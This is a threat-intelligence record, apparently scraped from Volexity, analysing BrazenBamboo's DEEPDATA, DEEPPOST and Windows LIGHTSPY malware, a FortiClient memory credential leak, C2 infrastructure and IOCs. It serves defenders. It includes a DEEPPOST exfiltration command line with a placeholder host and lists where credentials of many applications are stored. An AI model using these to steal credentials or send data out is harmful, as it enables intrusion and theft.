{ "id": "049915e4-eead-4bb7-ad51-f90515e714e8", "created_at": "2026-04-06T00:13:43.132213Z", "updated_at": "2026-04-10T13:12:48.729291Z", "deleted_at": null, "sha1_hash": "9b1d0db685cc28db58e242b341974a2c6f79cd0d", "title": "BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials via DEEPDATA", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 914502, "plain_text": "BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN\r\nCredentials via DEEPDATA\r\nBy mindgrub\r\nPublished: 2024-11-15 · Archived: 2026-04-02 11:20:52 UTC\r\n[Update: At the time of publication, this vulnerability had not been addressed by Fortinet. On December 18, 2024,\r\nFortinet published a public acknowledgement of the issue, affected versions, as well as patching \u0026 workaround\r\nadvice.]\r\nIn July 2024, Volexity identified exploitation of a zero-day credential disclosure vulnerability in Fortinet’s\r\nWindows VPN client that allowed credentials to be stolen from the memory of the client’s process. This\r\nvulnerability was discovered while analyzing a recent sample of the DEEPDATA malware family. DEEPDATA is\r\na modular post-exploitation tool for the Windows operating system that is used to gather a wide range of\r\ninformation from target devices. Analysis of the sample revealed a plugin that was designed to extract credentials\r\nfrom FortiClient VPN client process memory. On July 18, 2024, Volexity notified Fortinet about this vulnerability.\r\nSince the time of Volexity’s initial discovery and reporting to Fortinet, ThreatFabric and Blackberry have each\r\npublished reports that cover different aspects of some of the content discussed in this post.  \r\nVolexity attributes the development of DEEPDATA to a Chinese state-affiliated threat actor that it tracks as\r\nBrazenBamboo. Volexity has observed links between BrazenBamboo and three distinct malware families:\r\nLIGHTSPY, DEEPDATA, and DEEPPOST. Volexity tracks BrazenBamboo as the developer of these malware\r\nfamilies and not necessarily one of the operators using them (there may be many). Volexity has also identified a\r\nnew Windows variant of LIGHTSPY that was not previously documented at the time of writing.\r\nThis blog post details the use and functionality of DEEPDATA, with a key look at zero-day exploitation of the\r\nFortiClient vulnerability, and how DEEPPOST is used to exfiltrate files from compromised systems. This blog\r\npost also looks at the recently discovered Windows variant of LIGHTSPY, including notable changes, and the\r\nassociated wider command-and-control (C2) infrastructure of the BrazenBamboo threat actor.\r\nMalware Analysis\r\nVolexity’s analysis began with discovery of an archive file named deepdata.zip\r\n(SHA256: 666a4c569d435d0e6bf9fa4d337d1bf014952b42cc6d20e797db6c9df92dd724 ) that is tied to\r\nBrazenBamboo. This archive contains several files that are part of two Windows malware families, which Volexity\r\nrefers to as DEEPDATA and DEEPPOST. Each malware family is analyzed in the sections that follow. Volexity\r\nalso separately obtained and analyzed a new Windows variant of LIGHTSPY that is described further below.\r\nDEEPDATA\r\nhttps://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/\r\nPage 1 of 16\n\nAs previously mentioned, DEEPDATA is a modular post-exploitation tool for Windows that facilitates collection\r\nof sensitive information from a compromised system. This tool must be run from the command line of a system by\r\nan attacker. The DEEPDATA malware elements include the following:\r\nFilename Description\r\ndata.dll DEEPDATA Loader\r\nmod.dat DEEPDATA Virtual File System (VFS)\r\nreadme.txt File containing DEEPDATA Execution Options\r\nThe readme.txt file describes how to execute the DEEPDATA loader, along with available parameters and a\r\ndecryption key.\r\nThe key parameter is used by the DEEPDATA loader file to decrypt and load the “core” components of the\r\nDEEPDATA malware family stored in the local VFS file ( mod.dat ). These components will always execute and\r\nare not dependent on additional parameters passed on the command line.\r\nThe core components of DEEPDATA include the following files:\r\n Filename Purpose\r\nframe.dll Shellcode – core orchestrator for plugin execution\r\nffmpeg.dll Contains Heaven’s Gate code to load 32-bit code in 64-bit processes\r\nvertdll.dll Collects event logs\r\niumdll.dll Library used to collect locally stored WeChat data\r\nucrtbase_enclave.dll Library used to collect locally stored Feishu data\r\nhttps://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/\r\nPage 2 of 16\n\nFilename Purpose\r\nd3dcompiler_47.dll Checks the running instant messaging apps (Line, Feishu, WeChat)\r\nThe architecture of DEEPDATA’s loader, core, and plugins is shown below.\r\nThe core components are always included in the VFS files, but Volexity was only able to find frame.dll stored\r\non the C2 servers. While DEEPDATA plugins are stored in the VFS files, they are also stored as their own\r\ndedicated files on the C2 servers; they can be loaded from either location. The DEEPDATA plugins in the VFS are\r\ndecrypted using the same key as the other components in the VFS.\r\nThe overall plugin logic is the same as that seen in LIGHTSPY malware samples, with the following exported\r\nfunctions used by the core orchestrator:\r\nExecuteCommand\r\nGetPluginCommandID\r\nGetPluginName\r\nGetPluginVersion\r\nDEEPDATA maintains configuration data within the VFS file with the following files stored in an encrypted state:\r\nhttps://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/\r\nPage 3 of 16\n\nFilename Description\r\nconfig.json Contains DEEPDATA configuration information\r\nmanifest.json Contains DEEPDATA plugin information\r\nmanifest1.json Contains DEEPDATA plugin information\r\ndate.ini Purpose unclear, contains a single byte of 0x30\r\nThe manifest.json file is also stored on the C2 server but in an unencrypted state.\r\nVolexity identified a total of 12 unique plugins for DEEPDATA, which are summarized below:\r\nPlugin Name Plugin Capabilities\r\nAccountInfo Steal credentials from 18 different sources on the compromised device.\r\nAppData Collect data from WeChat, WhatsApp and Signal on the compromised device.\r\nAudio Record audio on compromised devices.\r\nChatIndexedDb Steal databases from WhatsApp and Zalo chat clients.\r\nFortiClient\r\nExtract credentials and server information from process memory of FortiClient\r\nVPN processes.\r\nOutlook Collect contacts and emails from local Microsoft Outlook instances.\r\nSocialSoft Steal data from WeChat, Line, QQ, DingDing, Skype, Telegram, and Feishu applications.\r\nSoftwareList List installed software, folders, and files recursively from a base location.\r\nSystemInfo Gather basic enumeration information from the compromised device.\r\nTdMonitor Hook Telegram to retrieve messages from the application.\r\nWebBrowser\r\nCollect history, cookies, and passwords from Firefox, Chrome, Opera, and Edge web\r\nbrowsers.\r\nWifiList Collect details of stored WiFi keys and nearby hotspots.\r\nAs shown above, DEEPDATA supports a wide range of functionality to extract data from victims’ systems. The\r\nobserved functionality of several plugins is commonly seen and includes items typically stolen from victim\r\nsystems. However, Volexity noted the FortiClient plugin was uncommon and investigated it further. Volexity\r\nfound the FortiClient plugin was included through a library with the filename msenvico.dll . This plugin was\r\nfound to exploit a zero-day vulnerability in the Fortinet VPN client on Windows that allows it to extract the\r\ncredentials for the user from memory of the client’s process.\r\nhttps://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/\r\nPage 4 of 16\n\nAs seen in the code snippet below, the FortiClient plugin looks for the username, password, remote gateway, and\r\nport from two different JSON objects in memory.\r\nThis is similar to a previously documented vulnerability identified in 2016, where credentials could be discovered\r\nin memory based on hardcoded offsets in memory. The previous vulnerability does not have an associated CVE.\r\nVolexity verified the presence of these JSON objects in memory and confirmed this approach works against the\r\nlatest version available at the time of discovery (v7.4.0). Notably, the same approach does not work against older\r\nversions of the Fortinet VPN client. Volexity reported this vulnerability to Fortinet on July 18, 2024, and Fortinet\r\nacknowledged the issue on July 24, 2024. At the time of writing, this issue remains unresolved and Volexity is not\r\naware of an assigned CVE number.\r\nDEEPPOST\r\nDEEPPOST is a post-exploitation data exfiltration tool used to send files to a remote system. The following\r\nsample was analyzed:\r\nName(s) localupload.exe\r\nSize 618.5KB (633344 Bytes)\r\nFile Type application/x-dosexec\r\nMD5 533297a7084039bf6bda702b752e6b82\r\nSHA1 20214e2e93b1bb37108aa1b8666f6406fabca8a0\r\nSHA256 f4e72145e761bcc8226353bb121eb8e549dc0000c6535bfa627795351037dc8e\r\nhttps://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/\r\nPage 5 of 16\n\nVirusTotal First Submitted N/A\r\nDEEPPOST supports the following syntax:\r\nlocalupload.exe c:\\data_to_exfiltrate\\ ip:port\r\nExfiltration is performed via HTTPS to a hardcoded API endpoint, /api/third/file/upload/ , usually on port\r\n29983 (although this is not a default and would be set by the operator at the command line).\r\nLIGHTSPY Background\r\nThe LIGHTSPY malware family was publicly documented in 2020, when Kaspersky and Trend Micro reported on\r\na mobile malware campaign targeting individuals in Hong Kong. More recently, Lookout and ThreatFabric\r\ndiscussed LIGHTSPY mobile malware campaigns. Lookout linked malware they call “DragonEgg” (LIGHTSPY)\r\nto another malware family, WyrmSpy, and to a Department of Justice indictment regarding APT41. The macOS\r\nvariant of LIGHTSPY was discussed by Huntress and ThreatFabric, with the latter also detailing some associated\r\nC2 management infrastructure.\r\nTo summarize what is known and reported, LIGHTSPY is a multi-platform malware family with documented\r\nvariants for Android, iOS, and macOS. Kaspersky and ThreatFabric previously identified references to the\r\nexistence of variants for Windows, Linux, and Router, but they did not document further analysis.\r\nVolexity was able to retrieve copies of LIGHTSPY written specifically for Windows. In contrast to other\r\nLIGHTSPY variants, the Windows variant was not encoded with the same incremental XOR algorithm. Rather, it\r\nwas encoded with a more complex algorithm that also included padding at the beginning of the files. The\r\narchitecture for the Windows variant of LIGHTSPY is different from other documented OS variants. This variant\r\nis deployed by an installer that deploys a library to execute shellcode in memory. The shellcode downloads and\r\ndecodes the orchestrator component from the C2 server ( pic32.png for x86 and pic64.png for x64\r\narchitecture).\r\nThe loader used for these samples is BH_A006 , which has historically been used to load other malware families. It\r\nis not clear whether this is a commercially available loader or evidence of shared development capabilities across\r\ndifferent operators. A summary of the execution chain is below.\r\nhttps://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/\r\nPage 6 of 16\n\nOn first execution, the LIGHTSPY orchestrator sends a 102-byte UDP packet starting with 0x1A5F2E1\r\nfollowed by random bytes. LIGHTSPY expects the server to reply with a packet starting with 0x2A5F2E1 . If the\r\nserver replies properly, an account.bin file is created that contains the server answer, which has the same\r\nformat as a MAC address and is internally named “ broadband account mac “. If the file already exists, the DNS\r\nrequest is not performed. This UDP handshake is unique to the Windows variant.\r\nLike its counterparts, the Windows variant of LIGHTSPY uses WebSocket and HTTPS for communication, with\r\nWebSocket used for most JSON-based communications and HTTPS for exfiltration. An interesting observation to\r\nnote: The user-agent for the HTTPS request is copy-pasted from the macOS variant, as shown below.\r\nThe orchestrator expects all plugins to export the following functions:\r\nExecuteCommand\r\nGetPluginCommandID\r\nGetPluginName\r\nInitial\r\nStopCommand\r\nTime\r\nUnInitial\r\nhttps://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/\r\nPage 7 of 16\n\nUnlike the macOS variant, most of the code in the Windows variant is executed in memory. The LIGHTSPY\r\nWindows plugins are summarized below:\r\nPlugin Name Purpose\r\nAudio Records audio using the libavcodev library\r\nBrowser Collects cookies, history, stored credentials, and bookmarks from web-browsers\r\nFileManager\r\nProvides CRUD operations for files on the device and convenience methods for uploading\r\ndata to the C2 server\r\nKeyboard Records keystrokes\r\nScreen Records the user’s screen using the libavcodev library\r\nSoftware Collects information on installed software and manages services\r\nTerminal Provides a remote shell for the threat actor to execute commands\r\nVideo Records webcam and audio from the infected device\r\nInfrastructure\r\nDEEPDATA C2 Infrastructure\r\nAt the time of analysis, there were six C2 servers serving DEEPDATA payloads and hosting DEEPDATA-related\r\nmanagement applications. These servers were also configured for DEEPDATA usage:\r\nPort Function Technology\r\n28443\r\nDEEPDATA operator application, HTML title “spack-info”Nginx 1.14.0, Django Rest\r\nFramework\r\n28992 Hosts the various DEEPDATA plugins \u0026 config files Nginx 1.14.0\r\n28993 Communication channel for DEEPDATA implants/plugins\r\nNginx 1.14.0, Django Rest\r\nFramework\r\nThree of the six hosts were also running an API endpoint on port 48993 that, based on the API endpoints,\r\nappeared to be used for managing an instance of the web-crawling framework Scrapy.\r\nVolexity also identified four “keyboard-walk”-style strings used by BrazenBamboo in the URL patterns for\r\nDEEPDATA infrastructure:\r\nqweasdzxc\r\nqazxswedcvfr\r\nasdgdsfdsfasd\r\nhttps://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/\r\nPage 8 of 16\n\nasdgdsfee\r\nOne DEEPDATA C2 server had an API endpoint serving a developer change log for the malware. This log was\r\nwritten in Chinese, and the most recent entry was from October 2023; the oldest entry was April 2022. A\r\ntranslated version of the change log is provided in the Appendix.\r\nLIGHTSPY C2 Infrastructure\r\nAt the time of analysis, there were a total of 26 active hosts serving LIGHTSPY payloads. They were always\r\nhosted on a URL path starting with the string 963852741 . These servers host various artifacts used in both the\r\ndevelopment \u0026 deployment of LIGHTSPY, including manifest files indicating the current version available for\r\ndownload. When analyzing these manifest files, the last-modified times indicated that LIGHTSPY’s development\r\nbegan in 2019 and continued to be updated into 2024.\r\nThe LIGHTSPY C2 servers are less uniform than DEEPDATA, but generally the plugins are hosted on ports\r\n52202, 43202, or 54602. The C2 management infrastructure is hosted on nearby ports (generally 43201, 53501, or\r\n59501) but uses different starting strings for the URL paths:\r\n963852iuy\r\n963852poi\r\nOther BrazenBamboo C2 Infrastructure\r\nBrazenBamboo infrastructure also hosts other applications not directly linked to the LIGHTSPY and DEEPDATA\r\nmalware families. Many are built using the Vue framework and use a lazy loading method implemented by Vue to\r\ndecrease loading times to import JavaScript and CSS components. ThreatFabric’s report covered some of the\r\ninteresting aspects of these components. This functionality also reveals evidence of additional unreported\r\ncapabilities of the BrazenBamboo threat actor, including the following:\r\nA “Reptile” email theft platform\r\nA proxy generation platform\r\nA Big Data styled Analysis platform for stolen data, conveniently named 联网大数据综合分析平台\r\n(English translation: Internet Big Data Comprehensive Analysis Platform)\r\nSeveral configurable delivery methods, which are shown below. Another version of this panel listed the\r\nvulnerability attack as the “0day attack” type.\r\nhttps://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/\r\nPage 9 of 16\n\nThere is substantial wording in these applications that would align with a domestic surveillance intent for these\r\ncapabilities. The user management aspects of the panel also contain wording that suggests this tooling is used by\r\nmultiple third parties, such as requirements to input an organization when registering a user and the extensive\r\ndocumentation on how to use the platform.\r\nAttribution \u0026 Overlaps\r\nDEEPDATA and LIGHTSPY\r\nThe DEEPDATA malware family has several overlaps with the LIGHTSPY malware family:\r\nPlugin file and export function names\r\nShared program database (PDB) development paths\r\nShared JSON formatting for C2 communications\r\nSimilar formats for JSON configuration files\r\nSimilar plugin code execution flow:\r\nLIGHTSPY (left) and DEEPDATA (right) Audio.dll Plugins\r\nThe DEEPDATA and LIGHTSPY C2 infrastructure also has several overlaps:\r\nHistorically shared the same IP address for hosting plugins\r\nShared TLS certificates\r\nShared URL patterns for operator panels\r\nShared operator applications across C2 servers\r\nVolexity assesses with a high degree of confidence that these two malware families are developed by related\r\nentities and are suitable to be clustered under the same threat actor alias.\r\nPublic Reporting Overlaps\r\nSeveral C2 IP addresses mentioned in public reporting have overlaps with DEEPDATA infrastructure, including\r\nthe following:\r\nhttps://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/\r\nPage 10 of 16\n\nIP Address\r\nMention in Public\r\nReports\r\nOverlaps\r\n103.27.109[.]217\r\nHuntress’s \u0026\r\nThreatFabric’s macOS\r\nreports\r\nShares a self-signed TLS certificate with all currently\r\nactive DEEPDATA C2 servers\r\n103.27.108[.]207\r\nThreatFabric’s Mobile\r\nreport\r\nShares a self-signed TLS certificate with all currently\r\nactive DEEPDATA C2 servers\r\n121.201.109[.]98\r\nLookout’s DragonEgg\r\nreport\r\nBased on VirusTotal Intelligence URL submissions,\r\nVolexity assesses with moderate confidence this server\r\nhistorically hosted DEEPDATA plugins\r\nAudit Exposed Credentials with Volexity Volcano\r\nVolexity Volcano is a powerful memory analysis framework that can help investigate systems compromised by\r\nthis threat actor’s malware. It can also be used to proactively audit Windows, Linux, and macOS systems to\r\nidentify other applications that expose credentials in clear text. This is as easy as searching memory for strings\r\nknown to exist near the credentials, such as “remote_gateway” in this case. Another technique is to search for\r\nknown password values after authenticating to a Fortinet VPN connection via FortiClient, and more importantly,\r\nafter an extended period of time, to check for passwords after logging out. Volcano attributes memory pages back\r\nto their owning process or kernel module, which helps associate activity back to applications that may not handle\r\npasswords as securely as possible.\r\nConclusion\r\nVolexity’s analysis provides evidence that BrazenBamboo is a well-resourced threat actor who maintains multi-platform capabilities with operational longevity. The breadth and maturity of their capabilities indicates both a\r\ncapable development function and operational requirements driving development output. This evidence, combined\r\nwith the architectural decisions BrazenBamboo has made within their malware and related infrastructure, leads\r\nVolexity to assess with medium confidence that BrazenBamboo is a private enterprise that produces capabilities\r\nfor governmental operators concerned with domestic targets.\r\nSome key elements supporting Volexity’s assessment are below:\r\nThe language used in the C2 operator infrastructure references domestic surveillance and law enforcement\r\ncontexts.\r\nThere is a lack of operational security in the C2 infrastructure, which is typical of foreign intelligence\r\noperations.\r\nThe architecture decisions of DEEPDATA and LIGHTSPY are more typical of standard software\r\ndevelopment practices than malware families.\r\nThere is continued development and operation of LIGHTSPY despite a notable number of public reporting\r\non its capabilities and indicators.\r\nhttps://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/\r\nPage 11 of 16\n\nIn recent years, this style of operation has become well publicized for China-based threat actors, with\r\nnotable examples including Chengdu 404 and iSOON.\r\nThe timestamps associated with the latest payloads for DEEPDATA and LIGHTSPY are evidence that both\r\nmalware families continue to be developed. The backend infrastructure maintained by BrazenBamboo to analyze\r\nthe data retrieved by their malware families offers insight into the scale of this collection, driving a requirement\r\nfor custom analyst software to analyze this data at scale.\r\nTo detect the malware used in this specific attack, Volexity recommends the following:\r\nUse the rules provided here to detect related activity.\r\nBlock the IOCs provided here.\r\nVolexity’s Threat Intelligence research, such as the content from this blog, is published to customers via\r\nits Threat Intelligence Service. The details published in this post were shared with customers in a series\r\nof posts between February 2024 and August 2024. Volexity Network Security Monitoring customers are\r\nalso automatically covered through signatures and deployed detections from the threats and IOCs\r\ndescribed in this post.\r\nIf you are interested in learning more about Volexity products and services, please do not hesitate\r\nto contact us.\r\nAppendix\r\nDEEPDATA AccountInfo Plugin Targets\r\nTargeted Service Credential Theft Technique\r\nBaidu Net Disk In memory\r\nOneDrive By hooking web requests in the legitimate process\r\nKeePass In memory, by using the open-source tool KeeFarce\r\nQQ On disk\r\nWindows By using Mimikatz\r\nMail Master On disk, by querying an internal mail.db file\r\nFox Mail On disk, by reading the Account.rec0 file\r\nSquirrelSQL On disk, by reading the SQLAliases23.xml file\r\nDBVisualizer On disk, by reading the dbvis.xml file\r\nOpenSSH On disk, by reading the config and the ssh key files\r\nhttps://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/\r\nPage 12 of 16\n\nTargeted Service Credential Theft Technique\r\nMobaxterm In registry\r\nWinSCP In registry\r\nSecureCRT On disk, by reading the configuration files\r\nPutty In registry\r\nNavicat In registry\r\nDBeaver On disk, by reading the credentials-config.json file\r\nXshell On disk, by reading the sessions files\r\nXftp On disk, by reading the sessions files\r\nDEEPDATA Change Log [English Translation]\r\n{\r\n\"count\":18, \"next\":null, \"previous\":null, \"results\":[ {\r\n\"id\":23, \"time\":\"2023-10-1310036\", \"content\":\"{\\ \"title\\\":\\\"v3.2\\\",\\\"text\\\":\\\"1. Add tg\r\nlocal real-time monitoring;\\n2.tg secret capture and add template parameter\r\nconfiguration;\\n3. Repair the obtained Problems with data display;\\n4. Chat software adds\r\ntelegarm display;\\\"}\"\r\n}, {\r\n\"id\":22, \"time\":\"2023-06-30151833\", \"content\":\"{\\\"title\\ \":\\\"v3.1\\\",\\\"text\\\":\\\"1. Opera\r\nBrowser is added to the browser type\\n2. Yandex module is added to cookie crawler\r\nparsing\\n3. Whatapp parsing is redone\\n4. New Added signal chat software\\n5. Evidence\r\ncollection mode and monitoring mode can be configured in the template\\\"}\"\r\n}, {\r\n\"id\":21, \"time\":\"2023-05-1218630\", \"content\":\"{\\ \"title\\\":\\\"v3.0\\\",\\\"text\\\":\\\"1. Add a new\r\nmonitoring version, the client is online in real time, and realize websocket\r\ncommunication;\\n2. Add the function of issuing environmental recording instructions;\\ \\n3.\r\nAdd the online command issuance function for other functions; \\n4. Fix the problem of\r\nprogram blocking for continuous command issuance; \\n5. Optimize the recording command\r\nissuance interface; \\\"}\"\r\n}, {\r\n\"id\":20, \"time\":\"2023-01-2917537\", \"content\":\"{\\\"title\\\":\\\"V 2.1\\\",\\\"text\\\":\\\"1. Added data\r\nupload display for outlook emails \\n2. Fix a bug in outlook and support Onedrive\r\nacquisition. \\n3. Fixed the process list upload size field out-of-range bug\\\"}\"\r\n}, {\r\n\"id\":19, \"time\":\"2022-11-1118244\", \"content\":\"{\\\"title\\\": \\\"V2.0\\\",\\\"text\\\":\\\"1. Added\r\ntarget instant messaging software forensic information, including: Enterprise WeChat;\r\nhttps://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/\r\nPage 13 of 16\n\nforensic content includes session information, session chat content, contact information,\r\nand chat files;\\\" \"\r\n}\r\n\"},{\"id\":17,\"time\":\"2022-09-17185754\",\"content\":\" {\r\n\\\"title\\\":\\\"V1.5.1\\\",\\\"text\\\": \\\"1. Added the ability to obtain network card and session\r\ninformation; \\n2. Fixed the bug of not being able to go online when the terminal mac is\r\nempty; \\n3. Remove batches of local data, drivers, users, and browser passwords; \\n4. Repair\r\nBug in template configuration instructions not being executed;\\n5. Add new specified files\r\n(folders) to upload;\\n6. Add export cache files to chat software;\\n7. Add batch export of\r\nemails;\\n8. Fix system permission acquisition Bug in wx home directory failure;\\\"}\"\r\n}, {\r\n\"id\":16, \"time\":\"2022-08-29182530\", \"content\":\"{\\\"title\\\":\\\"V1.5\\ \", \\\"text\\\":\\\"1. The\r\nprogram supports input parameter acquisition tasks, and adds module configuration, which can\r\nbuild in the default extraction function;\\n2. Modify the execution loading method and use\r\nrundll32 for loading;\\n3. Program Encryption processing;\\n4. Simple data extraction through\r\nanti-virus processing, loading data.dll through 360, etc.;\\n5. New template configuration\r\nfunction for the website;\\n6. Local data improvement data details: port status, service\r\ncompany Name, process command line parameters, etc.;\\n7. New chat software WhatsApp,\r\nzalo;\\n8. Other website bug fixes;\\\"}\"\r\n}, {\r\n\"id\":15, \"time\":\"2022-07 -1518245\", \"content\":\"{\\\"title\\\":\\\"v1.4\\\",\\\"text\\\":\\\"1. Add local\r\ndata (service list, port list, user list, process list, Driver list) display\\n2. Fix the\r\nproblem of incorrect content in downloading email data attachments\\n3. Fix the problem of\r\ndata exported to csv wps when opening Chinese garbled characters\\n4. Fix the problem of\r\nincorrect user names when crawling Yahoo mailboxes\\ n5. Fix the problem of Baidu network\r\ndisk crawling error\\n6. Fix the problem of JD crawling data not being associated\\\"}\"\r\n}, {\r\n\"id\":14, \"time\":\"2022-07-0910226\", \"content\":\"{\\\"title\\\":\\\"v1.3\\\",\\\"text\\\":\\\"1. When\r\noptimizing the local directory search, when the content contains special characters, the\r\nreturned content is inaccurate\\n2. Optimize the timeout of deleting old data when re-parsing\r\nlocal directory files, and delete it in the celery task instead\\n3. Fix the problem of\r\nchromium browser obtaining mailbox cookies\\n4. Fix the problem of wx.mail.com, WeChat scan\r\nThe problem of not crawling emails when logging into QQ mailbox with code\\n5. Fix the\r\nproblem of crawling communication in QQ mailbox\\n6. Optimize file directory acquisition,\r\nfrom only obtaining c:/user to obtaining files under c drive All files outside the system\r\nfolder\\n\\\"}\"\r\n}, {\r\n\"id\":12, \"time\":\"2022-07-0116723\", \"content\":\"{\\\"title\\\":\\\"v1 .2.6\\\",\\\"text\\\":\\\"1. Add batch\r\nexport of chat data including WeChat, Line, DingTalk, Skype, Feishu\\n2. Add batch export of\r\nbrowser data, including browsers History, browser cookies\\n3. Add export task display,\r\nexport progress, and download functions. \\n4. Fix the problem of WeChat voice files not\r\nbeing found\\n5. Fix the bug of obtaining the file directory under system permission\\n6.\r\nhttps://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/\r\nPage 14 of 16\n\nAutomatically delete the file version after the output execution program is completed\\n7.\r\nFix the Skype update version modification program Get cookie path\\\"}\"\r\n}, {\r\n\"id\":11, \"time\":\"2022-06-25101259\", \"content\":\"{\\\"title\\\":\\\"v1.2.5\\\",\\\" text\\\":\\\"1. Optimize\r\nthe method of skype forensics from directly uploading TOKEN to directly uploading cookie\r\nfiles\\n2.Skype forensic information analysis module adds cookie file parsing operation\\n3.\r\nAdd target machine file directory information upload, including File size data, supports\r\nsearching for files or folders in specified directories\\n4. Fix the bug of losing Skype chat\r\nrecords when crawling files/voices/videos and other message records\\n5. Fix the problem of\r\nprogram crash when executing under system permissions\\\"} \"\r\n}, {\r\n\"id\":10, \"time\":\"2022-06-11122341\", \"content\":\"{\\\"title\\\":\\\"v1.2.4\\\",\\\"text\\\":\\\" 1. New\r\ntarget group management\\n2. New system user management and role management\\n3. New target\r\nforensic data deletion, including specific forensic batch data deletion (including data +\r\nfiles), all batch deletion, terminal Delete\\\"}\"\r\n}, {\r\n\"id\":9, \"time\":\"2022-06-04122318\", \"content\":\"{\\\"title\\\":\\\"v1.2.3\\\",\\\"text\\ \":\\\"1. New\r\ndisplay of travel evidence collection data, including travel account information, order\r\nlist, common consignee addresses (contact information)\\n2. New display of evidence\r\ncollection documents, including records of previous evidence collection documents, and the\r\nnumber of evidence collection documents Re-analysis function\\n3. New log audit function,\r\nincluding the operation log of the platform system, the forensic log of the forensic tool,\r\nand the analysis log of the forensic file\\\"}\"\r\n}, {\r\n\"id\":8, \"time\":\" 2022-05-28122318\", \"content\":\"{\\\"title\\\":\\\"v1.2.2\\\",\\\"text\\\":\\\" 1. New\r\ntarget WIFI information collection, including surrounding wifi list, local WIFI password\\n2.\r\nNewly added e-commerce forensic data display, including e-commerce account information,\r\norder list, common harvest address (contact information)\\\"}\"\r\n}, {\r\n\"id\":7, \"time\":\"2022 -05-21122318\", \"content\":\"{\\\"title\\\":\\\"v1.2.1\\\",\\\"text\\\":\\\" 1. Added\r\ntarget instant messaging software forensic information, including Feishu and Skype ;\r\nForensic content includes session information, session chat content, contact information,\r\nchat files\\n2. New instant messaging data display, including session information, session\r\nmembers, contact (friends) list, chat content, chat files, etc., supported Various commonly\r\nused operating functions, such as session retrieval, chat content retrieval (including\r\ncontextual viewing), chat file retrieval\\\"}\"\r\n}, {\r\n\"id\":6, \"time\":\"2022-05-14122318\", \"content \":\"{\\\"title\\\":\\\"v.1.1.2\\\",\\\"text\\\":\\\" 1. Added\r\ntarget instant messaging software forensic information, including Line and DingTalk;\r\nforensic content includes session information , session chat content, contact information,\r\nchat files\\n2. New browser cookies are added to collect evidence on target network identity\r\ndata information, including\\n 2.1 E-commerce forensics (such as JD.com, Taobao, Meituan)\\n\r\nhttps://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/\r\nPage 15 of 16\n\n2.2 Travel evidence collection (Ctrip, Qunar.com)\\n3. New email forensic data display,\r\nincluding email account information, email folder information, email list, email EML\r\ncontent\\\"}\"\r\n}, {\r\n\"id\":5, \" time\":\"2022-05-07122318\", \"content\":\"{\\\"title\\\":\\\"v1.1.1\\\",\\\"text\\\":\\\"1. Add\r\ntarget instant messaging software forensic information, Including WeChat; forensic content\r\nincludes session information, session chat content, contact information, and chat files\\n2.\r\nNew browser cookies are added to collect evidence on the target network identity data\r\ninformation, including\\n 2.1. Email forensics (such as NetEase email, QQ mailbox, 139\r\nmailbox, 189 mailbox, yahoo mailbox, hotmail mailbox, Gmail mailbox, etc.)\\\"}\"\r\n}, {\r\n\"id\":4, \"time\":\"2022-04-25122318\", \"content\":\"{ \\\"title\\\":\\\"v1.1.0\\\",\\\"text\\\":\\\"1. Add\r\ntarget basic information collection, including machine name, IP address, Mac address, brand,\r\nmodel, operating system, resolution , memory, CPU, etc.\\n2. Add target browser data\r\ninformation, including browser access records, browser cookie information, browser password\r\ninformation\\\"}\"\r\n}\r\n]\r\n}\r\nSource: https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/\r\nhttps://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/\r\nPage 16 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia", "ETDA" ], "origins": [ "web" ], "references": [ "https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/" ], "report_names": [ "brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": 